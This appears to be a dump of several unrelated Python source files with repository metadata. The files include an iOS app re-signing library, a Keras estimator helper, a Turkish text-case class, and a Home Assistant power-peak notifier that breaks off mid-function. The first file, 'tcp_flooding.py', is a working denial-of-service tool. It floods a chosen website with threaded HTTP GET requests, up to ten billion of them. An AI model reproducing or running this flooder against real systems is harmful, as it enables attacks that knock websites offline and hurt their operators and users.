| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867a45f315cdcc7854ea80a22125e3ed4f3423db
| 1,671
|
py
|
Python
|
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | 1
|
2021-03-15T16:48:05.000Z
|
2021-03-15T16:48:05.000Z
|
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | null | null | null |
src/security/tcp_flooding.py
|
janaSunrise/useful-python-snippets
|
f03285b8f0b44f87326ca982129dab80a18697f5
|
[
"Apache-2.0"
] | null | null | null |
import random
import socket
import string
import sys
import threading
import time
def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None:
# Threading support
thread_num = 0
thread_num_mutex = threading.Lock()
# Utility function
def print_status() -> None:
        nonlocal thread_num
thread_num_mutex.acquire(True)
thread_num += 1
print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...")
thread_num_mutex.release()
def generate_url_path():
msg = str(string.ascii_letters + string.digits + string.punctuation)
data = "".join(random.sample(msg, 5))
return data
def attack_() -> None:
print_status()
url_path = generate_url_path()
dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
dos.connect((ip, port))
msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n"
dos.send(msg.encode())
        except socket.error as exc:
            print(f"[ERROR] Site may be down | {exc}")
        finally:
            try:
                dos.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            dos.close()
try:
host = host.replace("https://", "").replace("http://", "").replace("www.", "")
ip = socket.gethostbyname(host)
except socket.gaierror:
print("[ERROR] Make sure you entered a correct website!")
sys.exit(2)
all_threads = []
for i in range(request_count):
        t1 = threading.Thread(target=attack_)
t1.start()
all_threads.append(t1)
time.sleep(0.01)
for current_thread in all_threads:
current_thread.join()
| 26.109375
| 88
| 0.591263
| 209
| 1,671
| 4.583732
| 0.497608
| 0.065762
| 0.043841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015715
| 0.276481
| 1,671
| 63
| 89
| 26.52381
| 0.776675
| 0.020347
| 0
| 0.043478
| 0
| 0
| 0.134639
| 0.014688
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.130435
| 0
| 0.23913
| 0.108696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867addf71ccf4a2d2cc021bb3410dbc784317269
| 319
|
py
|
Python
|
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | null | null | null |
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | 8
|
2020-01-28T22:17:25.000Z
|
2022-03-12T00:04:30.000Z
|
test.py
|
wangjm12138/Yolov3_wang
|
3d143c7cd863dec796edede3faedacc6590cab5e
|
[
"MIT"
] | null | null | null |
import random
class Yolov3(object):
def __init__(self):
self.num=0
self.input_size=[8,16,32]
def __iter__(self):
return self
def __next__(self):
a = random.choice(self.input_size)
self.num=self.num+1
if self.num<3:
return a
else:
raise StopIteration
yolo=Yolov3()
for data in yolo:
print(data)
| 16.789474
| 36
| 0.702194
| 53
| 319
| 3.962264
| 0.584906
| 0.133333
| 0.12381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038023
| 0.175549
| 319
| 18
| 37
| 17.722222
| 0.760456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0
| 0.058824
| 0.058824
| 0.411765
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
867b9f7391f64037b68d280aea495bc5295d4119
| 1,256
|
py
|
Python
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | 1
|
2021-09-15T14:44:45.000Z
|
2021-09-15T14:44:45.000Z
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | 1
|
2022-03-12T00:48:01.000Z
|
2022-03-12T00:48:01.000Z
|
utils/turkish.py
|
derenyilmaz/personality-analysis-framework
|
9e1f3ac1047b1df07498159de23f88f87644d195
|
[
"MIT"
] | null | null | null |
class TurkishText():
"""Class for handling lowercase/uppercase conversions of Turkish characters..
Attributes:
text -- Turkish text to be handled
"""
text = ""
l = ['ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç']
u = ['I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç']
def __init__(self, text):
self.text = text
def upper(self):
"""Converts the text into uppercase letters.
Returns string.
"""
res = ""
for i in self.text:
if i in self.l:
res += self.u[self.l.index(i)]
            else:
res += i.upper()
return res
def lower(self):
"""Converts the text into lowercase letters.
Returns string.
"""
res = ""
for i in self.text:
if i in self.u:
res += self.l[self.u.index(i)]
            else:
res += i.lower()
return res
def capitalize(self):
"""Converts each first letter to uppercase, and the rest to lowercase letters.
Returns string.
"""
m = self.text.split()
res = ""
for i in m:
res += TurkishText(i[0]).upper() + TurkishText(i[1:]).lower() + " "
        return res[:-1]
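# Quick demonstration of the dotted/dotless i handling (outputs follow from the
# conversion tables above):
#
#   TurkishText('istanbul').upper()             # 'İSTANBUL'
#   TurkishText('DİYARBAKIR').lower()           # 'diyarbakır'
#   TurkishText('izmir ankara').capitalize()    # 'İzmir Ankara'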
| 26.166667
| 86
| 0.468153
| 151
| 1,256
| 3.874172
| 0.344371
| 0.068376
| 0.047863
| 0.046154
| 0.283761
| 0.157265
| 0.157265
| 0.157265
| 0.157265
| 0.157265
| 0
| 0.003891
| 0.386147
| 1,256
| 47
| 87
| 26.723404
| 0.753567
| 0.265924
| 0
| 0.321429
| 0
| 0
| 0.017921
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0
| 0
| 0.392857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
868018c92dba01d6288623e8f84851ac57ade115
| 3,427
|
py
|
Python
|
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
tf/estimators/keras_estimator.py
|
aspratyush/dl_utils
|
c067831f3c72aba88223c231c7fbc249d997e222
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Imports
import os
import numpy as np
import tensorflow as tf
def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
"""
Run the estimator
"""
if optimizer is None:
        optimizer = tf.keras.optimizers.SGD(
            lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)
# 1. Compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 2. Create an estimator
model_est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir='./lenet')
# Training
# 3a. Create the training function
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['train'].astype(np.float32)},
y=Y['train'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 3b. Train the model
model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)
# Evaluate
# 4a. Evaluate the model
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={model.input_names[0]: X['test'].astype(np.float32)},
y=Y['test'].astype(np.float32),
batch_size=nb_batches,
num_epochs=nb_epochs,
shuffle=True
)
# 4b. Evaluate the model
model_eval = model_est.evaluate(input_fn=eval_input_fn)
print(model_eval)
return model_est, model_eval
def run_from_generator(
model, input_func=None, input_func_dict=None,
eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):
"""
Overloaded function to create an estimator using tf.data.Dataset
:param model : uncompiled keras model
:param input_fn : input function providing tf.data.Dataset to the estimator
:param input_fn_dict : dictionary containing input params for input_fn
:param eval_fn_dict : dictionary containing params for eval input_fn
:param model_dir : directory to store the trained model
"""
# 1. Create optimizer and compile model if optimizer is None
if (optimizer is None):
optimizer = tf.keras.optimizers.SGD(
lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)
# 2. compile the model
model.compile(
optimizer=optimizer, loss='categorical_crossentropy',
metrics=['accuracy'])
# 3. create estimator
dir_path = os.path.join(os.getcwd(), model_dir)
print("Model path chosen : ", dir_path)
if (not os.path.exists(dir_path)):
os.mkdir(dir_path)
print("Creating estimator...")
est = tf.keras.estimator.model_to_estimator(
keras_model=model, model_dir=dir_path)
# 4. Train and Evaluate the model
print("Training...")
# training spec
train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
max_steps=500)
# evaluation spec
eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))
# Run the training
model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)
#est.train(input_fn=lambda: input_func(input_func_dict),
# steps=None)
#
#est.evalute(input_fn=lambda: input_func(eval_func_dict))
return est
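# A minimal input_func sketch for run_from_generator, assuming the TF 1.x
# tf.data API used above; the dictionary keys and arrays are hypothetical.
def example_input_func(func_dict):
    """Build a batched, shuffled tf.data.Dataset from arrays in func_dict."""
    dataset = tf.data.Dataset.from_tensor_slices(
        (func_dict['features'], func_dict['labels']))
    return dataset.shuffle(1000).repeat().batch(func_dict['batch_size'])
# est = run_from_generator(model, input_func=example_input_func,
#                          input_func_dict={'features': x_train, 'labels': y_train, 'batch_size': 128},
#                          eval_func_dict={'features': x_test, 'labels': y_test, 'batch_size': 128},
#                          model_dir='lenet')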
| 31.731481
| 85
| 0.66443
| 463
| 3,427
| 4.688985
| 0.25054
| 0.051589
| 0.023952
| 0.033164
| 0.376785
| 0.361124
| 0.361124
| 0.330723
| 0.239521
| 0.239521
| 0
| 0.017202
| 0.23665
| 3,427
| 107
| 86
| 32.028037
| 0.812691
| 0.254158
| 0
| 0.218182
| 0
| 0
| 0.056718
| 0.019308
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036364
| false
| 0
| 0.109091
| 0
| 0.181818
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
8681c3c33618ecd1ae623aef1502da24ff44d7f8
| 15,279
|
py
|
Python
|
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | 1
|
2020-03-24T14:22:17.000Z
|
2020-03-24T14:22:17.000Z
|
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | null | null | null |
isign/archive.py
|
l0ui3/isign
|
c0730ac1ce1b32defe8c6016e19b9701184b0f5a
|
[
"Apache-2.0"
] | 1
|
2021-08-16T04:03:25.000Z
|
2021-08-16T04:03:25.000Z
|
""" Represents an app archive. This is an app at rest, whether it's a naked
app bundle in a directory, or a zipped app bundle, or an IPA. We have a
common interface to extract these apps to a temp file, then resign them,
and create an archive of the same type """
import abc
import biplist
from bundle import App, Bundle, is_info_plist_native
from exceptions import MissingHelpers, NotSignable, NotMatched
from distutils import spawn
import logging
import os
from os.path import abspath, dirname, exists, isdir, isfile, join, normpath
import tempfile
import re
from subprocess import call
from signer import Signer
import shutil
import zipfile
REMOVE_WATCHKIT = True
helper_paths = {}
log = logging.getLogger(__name__)
def get_helper(helper_name):
""" find paths to executables. Cached in helper_paths """
if helper_name not in helper_paths or helper_paths[helper_name] is None:
        # note, find_executable returns None if not found
# in other words, we keep retrying until found
helper_paths[helper_name] = spawn.find_executable(helper_name)
log.debug("got executable {} for {}".format(helper_paths[helper_name],
helper_name))
return helper_paths[helper_name]
def make_temp_dir():
return tempfile.mkdtemp(prefix="isign-")
def get_watchkit_paths(root_bundle_path):
""" collect sub-bundles of this bundle that have watchkit """
# typical structure:
#
# app_bundle
# ...
# some_directory
# watchkit_extension <-- this is the watchkit bundle
# Info.plist
# watchkit_bundle <-- this is the part that runs on the Watch
# Info.plist <-- WKWatchKitApp=True
#
watchkit_paths = []
for path, _, _ in os.walk(root_bundle_path):
if path == root_bundle_path:
continue
try:
bundle = Bundle(path)
except NotMatched:
# this directory is not a bundle
continue
if bundle.info.get('WKWatchKitApp') is True:
# get the *containing* bundle
watchkit_paths.append(dirname(path))
return watchkit_paths
def process_watchkit(root_bundle_path, should_remove=False):
""" Unfortunately, we currently can't sign WatchKit. If you don't
care about watchkit functionality, it is
generally harmless to remove it, so that's the default.
Remove when https://github.com/saucelabs/isign/issues/20 is fixed """
watchkit_paths = get_watchkit_paths(root_bundle_path)
if len(watchkit_paths) > 0:
if should_remove:
for path in watchkit_paths:
log.warning("Removing WatchKit bundle {}".format(path))
shutil.rmtree(path)
else:
raise NotSignable("Cannot yet sign WatchKit bundles")
class Archive(object):
__metaclass__ = abc.ABCMeta
# we use abc.abstractmethod throughout because there are certain class
# methods we want to ensure are implemented.
@abc.abstractmethod
def unarchive_to_temp(self):
""" Unarchive and copy to a temp directory """
pass
@abc.abstractmethod
def archive(cls, path, output_path):
""" Archive a directory to an output path """
pass
@abc.abstractmethod
def get_info(cls, path):
""" Obtain app metadata from Info.plist without unarchiving """
pass
@abc.abstractmethod
def precheck(cls, path):
""" Check if this is, in fact, an archive of this type """
pass
@abc.abstractmethod
def find_bundle_dir(cls, path):
""" Locate the directory of the main app (aka bundle) """
pass
class AppArchive(Archive):
""" The simplest form of archive -- a naked App Bundle, with no extra directory structure,
compression, etc """
@classmethod
def find_bundle_dir(cls, path):
""" Included for similarity with the zipped archive classes. In this case, the bundle dir
*is* the directory """
return path
@classmethod
def _get_plist_path(cls, path):
return join(cls.find_bundle_dir(path), "Info.plist")
@classmethod
def get_info(cls, path):
return biplist.readPlist(cls._get_plist_path(path))
@classmethod
def precheck(cls, path):
if not isdir(path):
return False
if not os.path.exists(cls._get_plist_path(path)):
return False
plist = cls.get_info(path)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def archive(cls, path, output_path):
if exists(output_path):
shutil.rmtree(output_path)
shutil.move(path, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
def __init__(self, path):
self.path = path
self.relative_bundle_dir = '.'
self.bundle_info = self.get_info(self.path)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir)
shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already
shutil.copytree(self.path, containing_dir)
process_watchkit(containing_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, '.', self.__class__)
class AppZipArchive(Archive):
""" Just like an app, except it's zipped up, and when repackaged,
should be re-zipped. """
app_dir_pattern = r'^([^/]+\.app/).*$'
extensions = ['.zip']
helpers = ['zip', 'unzip']
@classmethod
def is_helpers_present(cls):
""" returns False if any of our helper apps wasn't found in class init """
is_present = True
for helper_name in cls.helpers:
if get_helper(helper_name) is None:
log.error("missing helper for class {}: {}".format(cls.__name__, helper_name))
is_present = False
break
return is_present
@classmethod
def is_archive_extension_match(cls, path):
""" does this path have the right extension """
log.debug('extension match')
for extension in cls.extensions:
log.debug('extension match: %s', extension)
if path.endswith(extension):
return True
return False
@classmethod
def find_bundle_dir(cls, zipfile_obj):
relative_bundle_dir = None
apps = set()
file_list = zipfile_obj.namelist()
for file_name in file_list:
matched = re.match(cls.app_dir_pattern, file_name)
if matched:
apps.add(matched.group(1))
if len(apps) == 1:
log.debug("found one app")
relative_bundle_dir = apps.pop()
elif len(apps) > 1:
log.warning('more than one app found in archive')
else:
log.warning('no apps found in archive')
return relative_bundle_dir
@classmethod
def _get_plist_path(cls, relative_bundle_dir):
return join(relative_bundle_dir, "Info.plist")
@classmethod
def precheck(cls, path):
""" Checks if an archive looks like this kind of app. Have to examine
within the zipfile, b/c we don't want to make temp dirs just yet. This
recapitulates a very similar precheck in the Bundle class """
if not isfile(path):
return False
if not cls.is_helpers_present():
raise MissingHelpers("helpers not present")
is_native = False
log.debug('precheck')
log.debug('path: %s', path)
if (cls.is_archive_extension_match(path) and
zipfile.is_zipfile(path)):
log.debug("this is an archive, and a zipfile")
zipfile_obj = zipfile.ZipFile(path)
relative_bundle_dir = cls.find_bundle_dir(zipfile_obj)
if relative_bundle_dir is not None:
plist_path = cls._get_plist_path(relative_bundle_dir)
if plist_path not in zipfile_obj.namelist():
return False
plist = cls.get_info(relative_bundle_dir, zipfile_obj)
is_native = is_info_plist_native(plist)
log.debug("is_native: {}".format(is_native))
return is_native
@classmethod
def get_info(cls, relative_bundle_dir, zipfile_obj):
plist_path = cls._get_plist_path(relative_bundle_dir)
plist_bytes = zipfile_obj.read(plist_path)
return biplist.readPlistFromString(plist_bytes)
def __init__(self, path):
self.path = path
zipfile_obj = zipfile.ZipFile(path)
self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj)
self.bundle_info = self.get_info(self.relative_bundle_dir,
zipfile_obj)
def unarchive_to_temp(self):
containing_dir = make_temp_dir()
call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir])
app_dir = abspath(join(containing_dir, self.relative_bundle_dir))
process_watchkit(app_dir, REMOVE_WATCHKIT)
return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__)
@classmethod
def archive(cls, containing_dir, output_path):
""" archive this up into a zipfile. Note this is a classmethod, because
the caller will use us on a temp directory somewhere """
# the temp file is necessary because zip always adds ".zip" if it
# does not have an extension. But we want to respect the desired
# output_path's extension, which could be ".ipa" or who knows.
# So we move it to the output_path later.
#
# We also do a little dance with making another temp directory just
        # to construct the zip file. This is the best way to ensure an unused
# filename. Also, `zip` won't overwrite existing files, so this is safer.
temp_zip_dir = None
try:
# need to chdir and use relative paths, because zip is stupid
temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-")
temp_zip_file = join(temp_zip_dir, 'temp.zip')
call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir)
shutil.move(temp_zip_file, output_path)
log.info("archived %s to %s" % (cls.__name__, output_path))
finally:
if temp_zip_dir is not None and isdir(temp_zip_dir):
shutil.rmtree(temp_zip_dir)
class IpaArchive(AppZipArchive):
""" IPA is Apple's standard for distributing apps. Much like an AppZip,
but slightly different paths """
extensions = ['.ipa']
app_dir_pattern = r'^(Payload/[^/]+\.app/).*$'
class UncompressedArchive(object):
""" This just keeps track of some state with an unzipped app archive and
how to re-zip it back up once re-signed. The bundle is located somewhere
inside the containing directory, but might be a few directories down, like in
a ContainingDir/Payload/something.app
This class is also useful if you have an app that's already unzipped and
you want to sign it. """
def __init__(self, path, relative_bundle_dir, archive_class):
""" Path is the "Containing dir", the dir at the root level of the unzipped archive
(or the dir itself, in the case of an AppArchive archive)
relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app
archive class is the kind of archive this was (Ipa, etc.) """
self.path = path
self.relative_bundle_dir = relative_bundle_dir
self.archive_class = archive_class
bundle_path = normpath(join(path, relative_bundle_dir))
self.bundle = App(bundle_path)
def archive(self, output_path):
""" Re-zip this back up, or simply copy it out, depending on what the
original archive class did """
self.archive_class.archive(self.path, output_path)
def clone(self, target_path):
""" Copy the uncompressed archive somewhere else, return initialized
UncompressedArchive """
shutil.copytree(self.path, target_path)
return self.__class__(target_path,
self.relative_bundle_dir,
self.archive_class)
def remove(self):
# the containing dir might be gone already b/c AppArchive simply moves
# it to the desired target when done
if exists(self.path) and isdir(self.path):
log.debug('removing ua: %s', self.path)
shutil.rmtree(self.path)
def archive_factory(path):
""" Guess what kind of archive we are dealing with, return an
archive object. Returns None if path did not match any archive type """
archive = None
for cls in [IpaArchive, AppZipArchive, AppArchive]:
if cls.precheck(path):
archive = cls(path)
log.debug("File %s matched as %s", path, cls.__name__)
break
return archive
def view(input_path):
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotMatched('No matching archive type found')
ua = archive.unarchive_to_temp()
bundle_info = ua.bundle.info
finally:
if ua is not None:
ua.remove()
return bundle_info
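# Illustrative call (the path is hypothetical): inspect an archive's
# Info.plist without keeping the extracted copy around.
#
#   info = view('/tmp/example.ipa')
#   print(info.get('CFBundleIdentifier'))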
def resign(input_path,
certificate,
key,
apple_cert,
provisioning_profile,
output_path,
info_props=None,
alternate_entitlements_path=None):
""" Unified interface to extract any kind of archive from
a temporary file, resign it with these credentials,
and create a similar archive for that resigned app """
if not exists(input_path):
raise IOError("{0} not found".format(input_path))
log.debug('Signing with apple_cert: {}'.format(apple_cert))
log.debug('Signing with key: {}'.format(key))
log.debug('Signing with certificate: {}'.format(certificate))
log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile))
signer = Signer(signer_cert_file=certificate,
signer_key_file=key,
apple_cert_file=apple_cert)
ua = None
bundle_info = None
try:
archive = archive_factory(input_path)
if archive is None:
raise NotSignable('No matching archive type found')
ua = archive.unarchive_to_temp()
if info_props:
# Override info.plist props of the parent bundle
ua.bundle.update_info_props(info_props)
ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path)
bundle_info = ua.bundle.info
ua.archive(output_path)
except NotSignable as e:
msg = "Not signable: <{0}>: {1}\n".format(input_path, e)
log.info(msg)
raise
finally:
if ua is not None:
ua.remove()
return bundle_info
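# Illustrative call (all paths are hypothetical credential/profile files):
#
#   resign('/tmp/example.ipa',
#          certificate='/path/to/cert.pem',
#          key='/path/to/key.pem',
#          apple_cert='/path/to/apple.pem',
#          provisioning_profile='/path/to/profile.mobileprovision',
#          output_path='/tmp/example-resigned.ipa')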
| 37.540541
| 97
| 0.638458
| 1,978
| 15,279
| 4.749747
| 0.189585
| 0.027781
| 0.039808
| 0.015647
| 0.22363
| 0.173922
| 0.124747
| 0.107078
| 0.094518
| 0.08579
| 0
| 0.000906
| 0.277243
| 15,279
| 406
| 98
| 37.633005
| 0.84986
| 0.258328
| 0
| 0.340659
| 0
| 0
| 0.070612
| 0.004207
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117216
| false
| 0.018315
| 0.051282
| 0.014652
| 0.296703
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
86852eaa353d7f71b07181e8c40327dffa81fc7f
| 12,985
|
py
|
Python
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 18
|
2018-07-22T15:19:20.000Z
|
2022-01-09T20:57:43.000Z
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 1
|
2020-04-30T08:33:36.000Z
|
2020-05-03T08:25:00.000Z
|
config/appdaemon/apps/power_alarm.py
|
azogue/hassio_config
|
591f158794c173d6391179ab2f52348d58c49aad
|
[
"MIT"
] | 8
|
2018-07-21T09:29:53.000Z
|
2021-11-10T19:06:32.000Z
|
# -*- coding: utf-8 -*-
"""
Automation task as a AppDaemon App for Home Assistant -
current meter PEAK POWER notifications
"""
import datetime as dt
from enum import IntEnum
import appdaemon.plugins.hass.hassapi as hass
LOG_LEVEL = "INFO"
LOG_LEVEL_ALERT = "WARNING"
LOGGER = "special_event_log"
COEF_CRITICAL_LIMIT = 1.1 # 10% over limit
MIN_TIME_TURN_OFF_AC = 60 # secs
# Big power consumers
BIG_CONSUMER_1_CLIMATE = "switch.ac_dry_contact"
BIG_CONSUMER_1_LABEL = "aire acondicionado"
BIG_CONSUMER_2 = "switch.calentador"
BIG_CONSUMER_2_LABEL = "calentador"
_IOS_SOUND_POWER_PEAK = "US-EN-Morgan-Freeman-Vacate-The-Premises.wav"
class TypeNotif(IntEnum):
"""
Handler for different kinds of power notifications.
Used to centralize push message construction.
"""
ALERT_OFF = 0
ALERT_ON = 1
ALERT_CRITICAL = 2
def make_ios_push_data(self, data_msg: dict) -> dict:
if self.value == self.ALERT_CRITICAL:
push_data = {
"category": "powerpeak",
"badge": 10,
"sound": _IOS_SOUND_POWER_PEAK,
"critical": 1,
"volume": 1.0,
"thread-id": "power-peak-group",
}
elif self.value == self.ALERT_ON:
push_data = {
"category": "powerpeak",
"thread-id": "power-peak-group",
"badge": 1,
"critical": 1,
"sound": _IOS_SOUND_POWER_PEAK,
}
else:
push_data = {
"category": "confirm",
"thread-id": "power-peak-group",
"sound": _IOS_SOUND_POWER_PEAK,
"badge": 0,
}
data_msg["data"] = {"push": push_data}
return data_msg
def make_telegram_push_data(self, data_msg: dict, target: int) -> dict:
data_msg["target"] = target
data_msg["disable_notification"] = self.value == self.ALERT_OFF
data_msg["inline_keyboard"] = [
[("Luces ON", "/luceson"), ("Luces OFF", "/lucesoff")],
[
("Potencia eléctrica", "/enerpi"),
("Grafs. enerPI", "/enerpitiles"),
],
[
(
"Calentador OFF",
"/service_call switch/turn_off switch.calentador",
),
(
"AC OFF",
"/service_call switch/turn_off switch.ac_dry_contact",
),
],
]
return data_msg
def make_notification_message(
self,
current_peak,
last_trigger,
alarm_start,
devices_off="",
pow_instant=0.0,
pow_sustained=0.0,
) -> dict:
if self.value == self.ALERT_CRITICAL:
return {
"title": "¡El automático está a punto de saltar!",
"message": (
f"Apagando {devices_off} para intentar evitar "
"la sobrecarga eléctrica."
),
}
time_now = (
"{:%H:%M:%S}".format(last_trigger)
if last_trigger is not None
else "???"
)
if self.value == self.ALERT_ON:
data_msg = {
"title": "Alto consumo eléctrico!",
"message": (
f"Peak: {current_peak} W en {time_now}. "
f"Ahora {pow_instant} W ({pow_sustained} sostenidos)"
),
}
data_msg["message"] = data_msg["message"].format(
current_peak, time_now, pow_instant, pow_sustained
)
else:
duration_min = (
dt.datetime.now() - alarm_start
).total_seconds() / 60.0
data_msg = {
"title": "Consumo eléctrico: Normal",
"message": (
f"Potencia normal desde {time_now}, "
f"Pico de potencia: {current_peak} W. "
f"Alerta iniciada hace {duration_min:.1f} min."
),
}
return data_msg
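# Sketch of how the enum centralises message construction (values are
# illustrative):
#
#   notif = TypeNotif.ALERT_ON
#   msg = notif.make_notification_message(
#       current_peak=4800, last_trigger=dt.datetime.now(), alarm_start=None,
#       pow_instant=4500, pow_sustained=4200)
#   ios_payload = notif.make_ios_push_data(msg.copy())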
# noinspection PyClassHasNoInit
class PeakNotifier(hass.Hass):
"""
App to notify power peaks (when they are greater than a certain limit),
and after that, notify when back to normal (< lower limit).
"""
# Limit Values
_max_peak: float
_upper_limit: float
_lower_limit: float
_min_time_high: int
_min_time_low: int
# App user inputs
_main_power: str
_main_power_peak: str
_notifier: str
_target_sensor: str
_alarm_state: bool = False
_critical_alarm_state: bool = False
_last_trigger = None
_alarm_start = None
_turn_off_measure_taken = False
_current_peak = 0
def initialize(self):
"""AppDaemon required method for app init."""
self._main_power = self.args.get("sustained_power")
self._main_power_peak = self.args.get("instant_power")
self._notifier = self.config.get("notifier").replace(".", "/")
self._target_sensor = self.config.get("chatid_sensor")
# Power limits
self._upper_limit = float(self.args.get("max_power_kw")) * 1000.0
self._lower_limit = float(self.args.get("max_power_kw_reset")) * 1000.0
self._min_time_high = int(self.args.get("min_time_high"))
self._min_time_low = int(self.args.get("min_time_low"))
# TODO implement _max_peak over _instant_power
self._max_peak = float(self.args.get("max_power_peak_kw")) * 1000.0
# Listen for Main Power changes:
self.listen_state(self.main_power_change, self._main_power)
self.log(
f"PeakNotifier Initialized. P={self._main_power}, "
f"with P>{self._upper_limit} W for {self._min_time_high} secs, "
f"(low={self._lower_limit} W for {self._min_time_low} secs). "
f"Notify: {self._notifier}.",
level=LOG_LEVEL,
log=LOGGER,
)
def notify_alert(self, type_notif: TypeNotif, data: dict):
ios_alarm_msg = type_notif.make_ios_push_data(data.copy())
tlg_alarm_msg = type_notif.make_telegram_push_data(
data.copy(), target=int(self.get_state(self._target_sensor)),
)
self.call_service(self._notifier, **ios_alarm_msg)
self.call_service("telegram_bot/send_message", **tlg_alarm_msg)
# noinspection PyUnusedLocal
def peak_power_change(self, entity, attribute, old, new, kwargs):
"""Power Peak ALARM logic control."""
try:
new = int(float(new))
